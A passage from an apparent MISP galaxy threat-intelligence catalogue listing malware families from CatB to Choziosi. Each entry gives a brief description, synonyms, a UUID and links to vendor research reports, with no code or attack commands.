in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.catb - webarchive
- https://www.sentinelone.com/blog/decrypting-catb-ransomware-analyzing-their-latest-attack-methods/ - webarchive
- https://www.vmray.com/cyber-security-blog/catb-ransomware-a-new-threat-exploiting-dll-side-loading/ - webarchive
- http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf - webarchive
- https://hitcon.org/2023/CMT/slide/Unmasking%20CamoFei_An%20In-depth%20Analysis%20of%20an%20Emerging%20APT%20Group%20Focused%20on%20Healthcare%20Sectors%20in%20East%20Asia.pdf - webarchive
- https://www.sentinelone.com/labs/chamelgang-attacking-critical-infrastructure-with-ransomware/ - webarchive
- https://minerva-labs.com/blog/new-catb-ransomware-employs-2-year-old-dll-hijacking-technique-to-evade-detection/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Catchamas
Internal MISP references
UUID 8060dbdc-cf31-40bc-9900-eb8119423c50
which can be used as unique global reference for Catchamas
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CCleaner Backdoor
According to CrowdStrike, this backdoor was discovered embedded in the legitimate, signed version of CCleaner 5.33, and thus constitutes a supply chain attack.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CCleaner Backdoor.
Known Synonyms |
---|
DIRTCLEANER |
Internal MISP references
UUID c51ee09b-fc2d-41fd-a43b-426a4f337139
which can be used as unique global reference for CCleaner Backdoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor - webarchive
- https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf - webarchive
- http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html - webarchive
- https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident - webarchive
- https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer - webarchive
- http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor - webarchive
- https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf - webarchive
- https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/ - webarchive
- http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/ - webarchive
- https://securelist.com/big-threats-using-code-similarity-part-1/97239/ - webarchive
- https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/ - webarchive
- https://www.wired.com/story/ccleaner-malware-targeted-tech-firms - webarchive
- https://blog.avast.com/progress-on-ccleaner-investigation - webarchive
- http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/ - webarchive
- https://stmxcsr.com/persistence/print-processor.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
- https://risky.biz/whatiswinnti/ - webarchive
- http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html - webarchive
- https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident - webarchive
- https://twitter.com/craiu/status/910148928796061696 - webarchive
- https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities - webarchive
- https://www.mandiant.com/resources/pe-file-infecting-malware-ot - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CEELOADER
Mandiant characterizes this malware as a downloader and shellcode stager.
Internal MISP references
UUID 0333d13e-e01f-46cd-a030-448bbf043c10
which can be used as unique global reference for CEELOADER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CenterPOS
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CenterPOS.
Known Synonyms |
---|
cerebrus |
Internal MISP references
UUID fca8c5e0-4fef-408c-bcd7-9826271e8e5d
which can be used as unique global reference for CenterPOS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cerber
A prolific ransomware which originally added ".cerber" as a file extension to encrypted files. It has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of UDP activity to check in and report infections. Primarily uses TOR for payment information.
Internal MISP references
UUID 79a7203a-6ea5-4c39-abd4-faa20cf8821a
which can be used as unique global reference for Cerber
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus - webarchive
- https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://www.justice.gov/usao-dc/press-release/file/1021186/download - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://www.youtube.com/watch?v=y8Z9KnL8s8s - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/ - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/ - webarchive
- https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/ - webarchive
- https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CetaRAT
Internal MISP references
UUID 12d2d503-def6-4161-bd42-2093ccad49bd
which can be used as unique global reference for CetaRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ceta_rat - webarchive
- https://blogs.quickheal.com/cetarat-apt-group-targeting-the-government-agencies/ - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ChaChi
Internal MISP references
UUID 6a3e6f07-1aaa-4af5-8bd3-96898aca3510
which can be used as unique global reference for ChaChi
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chaes
This malware made its first appearance during the middle to end of 2020; it specifically targets Brazil and the largest e-commerce company in Latin America, Mercado Livre. It is a multistage malware deployment which uses several legitimate Windows processes and open source tools to remain undetected.
Internal MISP references
UUID 0d4ab3af-189f-49af-b47a-9b25f59f9a12
which can be used as unique global reference for Chaes
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.chaes - webarchive
- https://www.morphisec.com/hubfs/Chae$_Chronicles_Chaes4.1.pdf - webarchive
- https://blog.morphisec.com/chaes4-new-chaes-malware-variant-targeting-financial-and-logistics-customers - webarchive
- https://blog.morphisec.com/chaes-chronicles - webarchive
- https://decoded.avast.io/anhho/chasing-chaes-kill-chain/ - webarchive
- https://www.cybereason.com/hubfs/dam/collateral/reports/11-2020-Chaes-e-commerce-malware-research.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chainshot
Internal MISP references
UUID 36f9a5e0-9a78-4b9a-9072-1596c91b59b6
which can be used as unique global reference for Chainshot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot - webarchive
- https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack - webarchive
- https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/ - webarchive
- https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ - webarchive
- https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec - webarchive
- https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CHAIRSMACK
Internal MISP references
UUID f049e626-7de2-4648-81db-53dfd34f2fab
which can be used as unique global reference for CHAIRSMACK
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chaos (Windows)
In-development ransomware family which was released in June 2021 by an unknown threat actor. The builder initially claimed to be a "Ryuk .Net Ransomware Builder" even though it was completely unrelated to the Ryuk malware family. Presently it appears to contain trojan-like features, but lacks features commonly found in ransomware such as data exfiltration.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chaos (Windows).
Known Synonyms |
---|
FakeRyuk |
RyukJoke |
Yashma |
Internal MISP references
UUID fb760029-9331-4ba0-b644-d47a8e6d3ad2
which can be used as unique global reference for Chaos (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos - webarchive
- https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/ - webarchive
- https://threatmon.io/chaos-unleashed-a-technical-analysis-of-a-novel-ransomware/ - webarchive
- https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree - webarchive
- https://www.bleepingcomputer.com/news/security/roblox-game-pass-store-used-to-sell-ransomware-decryptor/ - webarchive
- https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia - webarchive
- https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html - webarchive
- https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging - webarchive
- https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/ - webarchive
- https://brianstadnicki.github.io/posts/malware-chaos-ransomware-v4/ - webarchive
- https://labs.k7computing.com/index.php/ransomed-by-warlock-dark-army-officials/ - webarchive
- https://twitter.com/vinopaljiri/status/1519645742440329216 - webarchive
- https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-in-fake-minecraft-alt-list-brings-destruction - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chaperone
According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, document and cryptography key stealers, and even its own file indexer for the victim’s machine. Kaspersky discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chaperone.
Known Synonyms |
---|
Taj Mahal |
Internal MISP references
UUID e4027aaa-de86-48ea-8567-c215cdb88ec1
which can be used as unique global reference for Chaperone
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ChargeWeapon
Internal MISP references
UUID 4eccbebb-9f7d-411f-a8fe-da01c99c8e3b
which can be used as unique global reference for ChargeWeapon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CHCH
CHCH is a ransomware spotted in the wild in December 2019. It encrypts victim files and adds the extension .chch to them, and drops a ransom note named READ_ME.TXT.
Internal MISP references
UUID 22b03600-505c-41d4-ba1c-45d70cc2e123
which can be used as unique global reference for CHCH
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ChChes
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ChChes.
Known Synonyms |
---|
HAYMAKER |
Ham Backdoor |
Internal MISP references
UUID 6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c
which can be used as unique global reference for ChChes
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.chches - webarchive
- https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html - webarchive
- http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-riverside - webarchive
- https://www.jpcert.or.jp/magazine/acreport-ChChes.html - webarchive
- https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CHEESETRAY
CHEESETRAY is a sophisticated proxy-aware backdoor that can operate in both active and passive mode depending on the passed command-line parameters. The backdoor is capable of enumerating files and processes, enumerating drivers, enumerating remote desktop sessions, uploading and downloading files, creating and terminating processes, deleting files, creating a reverse shell, acting as a proxy server, and hijacking processes, among other functionality. The backdoor communicates with its C&C server using a custom binary protocol over TCP, with the port specified as a command-line parameter.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CHEESETRAY.
Known Synonyms |
---|
CROWDEDFLOUNDER |
Internal MISP references
UUID 7a6c1063-32b9-4007-8283-ccd4a2163caa
which can be used as unique global reference for CHEESETRAY
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/ar20-045c - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf - webarchive
- https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chernolocker
Chernolocker is a ransomware that encrypts a victim's files by using AES-256 and it asks for BTC ransom. Different versions are classified by the attacker's email address which changes over time.
Internal MISP references
UUID e21dc86d-c8a5-44f7-b9d6-5e60373e838b
which can be used as unique global reference for Chernolocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CherryLoader
Internal MISP references
UUID c79c6ad0-3ee9-4fca-be20-084e012ff002
which can be used as unique global reference for CherryLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CherryPicker POS
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CherryPicker POS.
Known Synonyms |
---|
cherry_picker |
cherrypicker |
cherrypickerpos |
Internal MISP references
UUID e6ab90d3-8011-4927-a0cd-eab57e7971aa
which can be used as unique global reference for CherryPicker POS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/ - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/ - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ChewBacca
Internal MISP references
UUID 2137a0ce-8d06-4538-ad0b-6ab6ec865493
which can be used as unique global reference for ChewBacca
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chimera
According to PCrisk, Chimera is a ransomware virus that encrypts files stored on infected systems. It is distributed using various false job applications, business offers, and infected email attachments. After encrypting the files, Chimera adds a .crypt extension to each file.
Internal MISP references
UUID 830b0526-8e3b-4369-9677-9f8a31ca5ded
which can be used as unique global reference for Chimera
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CHINACHOPPER
A simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and perform any other action allowed by the .NET runtime.
Internal MISP references
UUID 0d8f0bb7-e14f-4b85-baa1-6ec951aa6c53
which can be used as unique global reference for CHINACHOPPER
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/ - webarchive
- https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf - webarchive
- https://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1 - webarchive
- https://unit42.paloaltonetworks.com/china-chopper-webshell/ - webarchive
- https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion - webarchive
- https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html - webarchive
- https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html - webarchive
- https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/ - webarchive
- https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks - webarchive
- https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4 - webarchive
- https://secjoes-reports.s3.eu-central-1.amazonaws.com/Backdoor%2Bvia%2BXFF%2BMysterious%2BThreat%2BActor%2BUnder%2BRadar.pdf - webarchive
- https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html - webarchive
- https://attack.mitre.org/software/S0020/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/ - webarchive
- https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/ - webarchive
- https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
- https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/ - webarchive
- https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-275a - webarchive
- https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html - webarchive
- https://attack.mitre.org/groups/G0125/ - webarchive
- https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968 - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a - webarchive
- https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf - webarchive
- https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf - webarchive
- https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers - webarchive
- https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/ - webarchive
- https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html - webarchive
- https://unit42.paloaltonetworks.com/operation-diplomatic-specter/ - webarchive
- https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers - webarchive
- https://archive.is/LJFEF - webarchive
- https://unit42.paloaltonetworks.com/atoms/iron-taurus/ - webarchive
- https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers - webarchive
- https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-president - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection - webarchive
- https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-259a - webarchive
- https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html - webarchive
- https://asec.ahnlab.com/en/47455/ - webarchive
- https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-express - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos - webarchive
- https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders - webarchive
- https://redcanary.com/blog/microsoft-exchange-attacks - webarchive
- https://www.youtube.com/watch?v=rn-6t7OygGk - webarchive
- https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/ - webarchive
- https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/ - webarchive
- https://twitter.com/CyberRaiju/status/1373582619707867136 - webarchive
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers - webarchive
- https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/ - webarchive
- https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/ - webarchive
- https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/ - webarchive
- https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran - webarchive
- https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/ - webarchive
- https://www.praetorian.com/blog/reproducing-proxylogon-exploit/ - webarchive
- https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html - webarchive
- https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html - webarchive
- https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-union - webarchive
- https://twitter.com/ESETresearch/status/1366862946488451088 - webarchive
- https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ - webarchive
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - webarchive
- https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage - webarchive
- https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html - webarchive
- https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html - webarchive
- https://blog.joshlemon.com.au/hafnium-exchange-attacks/ - webarchive
- https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf - webarchive
- https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers - webarchive
- https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
- https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - webarchive
- https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728 - webarchive
- https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chinad
Adware that shows advertisements using plugin techniques for popular browsers.
Internal MISP references
UUID 098cfb93-8921-48f0-a694-a83f350e8a61
which can be used as unique global reference for Chinad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ChinaJm
Ransomware.
Internal MISP references
UUID ef216f1d-9ee5-4676-ae34-f954a8611290
which can be used as unique global reference for ChinaJm
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chinotto (Windows)
Internal MISP references
UUID fda4561c-56a9-479b-8db5-7f6774be9a3d
which can be used as unique global reference for Chinotto (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.chinotto - webarchive
- https://threatmon.io/chinotto-backdoor-technical-analysis-of-the-apt-reapers-powerful/ - webarchive
- https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37 - webarchive
- https://www.boho.or.kr/data/reportView.do?bulletin_writing_sequence=67064 - webarchive
- https://blog.sekoia.io/peeking-at-reaper-surveillance-operations-against-north-korea-defectors/ - webarchive
- https://thorcert.notion.site/TTPs-9-f04ce99784874947978bd2947738ac92 - webarchive
- https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chinoxy
Internal MISP references
UUID f8f5f33b-c719-4b6d-bf98-07979ac0cd97
which can be used as unique global reference for Chinoxy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://nao-sec.org/2021/01/royal-road-redive.html - webarchive
- https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis - webarchive
- https://community.riskiq.com/article/5fe2da7f - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf - webarchive
- https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746 - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-finding-APTX-attributing-attacks-via-MITRE-TTPs.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists - webarchive
- https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ffd98ca2a02 - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf - webarchive
- https://community.riskiq.com/article/56fa1b2f - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chir
Internal MISP references
UUID 59b5697a-5154-4c08-87f8-c71b0e8425fc
which can be used as unique global reference for Chir
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chisel (Windows)
Chisel is an open-source project by Jaime Pillora (jpillora) that allows tunneling TCP and UDP connections via HTTP. It is available across platforms and written in Go. While benign in itself, Chisel has been utilized by multiple threat actors. For example, SentinelOne observed it during a PYSA ransomware campaign, where it was used to achieve persistence and as a backdoor. GitHub: https://github.com/jpillora/chisel
Internal MISP references
UUID fbfbbcbc-6730-4c4d-9ece-9b72802d42e9
which can be used as unique global reference for Chisel (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.chisel - webarchive
- https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/ - webarchive
- https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/ - webarchive
- https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ChiserClient
Internal MISP references
UUID 637714e1-c46d-4c10-bbc5-604c6e47fbbb
which can be used as unique global reference for ChiserClient
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Choziosi (Windows)
Choziosi is a browser hijacker for Chrome. It was first seen in January 2022. It commonly infects users via pirated media downloads like games, software, wallpapers or movies. The initial infectors are available for several platforms such as Mac and Windows.
Its main component is a Chrome browser extension written in JavaScript with the purpose of serving advertisements and hijacking search requests to Google, Yahoo and Bing.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Choziosi (Windows).
Known Synonyms |
---|
ChromeLoader |
Internal MISP references
UUID 7cfa3158-ccfc-4c23-8e7a-5d4e9cc1c43f
which can be used as unique global reference for Choziosi (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.choziosi - webarchive
- https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension - webarchive
